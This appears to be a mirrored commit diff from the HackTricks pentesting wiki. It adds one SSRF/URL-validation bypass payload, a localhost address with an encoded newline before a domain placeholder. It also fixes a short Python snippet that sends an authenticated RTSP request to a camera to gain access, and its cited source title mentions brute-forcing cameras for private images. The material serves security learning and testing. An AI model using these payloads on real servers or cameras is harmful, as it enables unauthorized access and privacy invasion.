mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [#3004] No subject
This commit is contained in:
parent
54477fd88e
commit
de130e5afb
2 changed files with 3 additions and 2 deletions
|
@ -76,6 +76,7 @@ http://127.0.0.1%00{domain}
|
|||
http://127.0.0.1?{domain}
|
||||
http://127.0.0.1///{domain}
|
||||
https://127.0.0.1%00{domain}
|
||||
https://127.0.0.1%0A{domain}
|
||||
https://127.0.0.1?{domain}
|
||||
https://127.0.0.1///{domain}
|
||||
```
|
||||
|
|
|
@ -49,13 +49,13 @@ req = "DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic Y
|
|||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(("192.168.1.1", 554))
|
||||
s.sendall(req)
|
||||
data = s.recv()
|
||||
data = s.recv(1024)
|
||||
print(data)
|
||||
```
|
||||
|
||||
Voila! You have access.
|
||||
|
||||
**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/)\*\*\*\*
|
||||
**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](https://web.archive.org/web/20161020202643/http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/)****
|
||||
|
||||
## Enumeration
|
||||
|
||||
|
|
Loading…
Reference in a new issue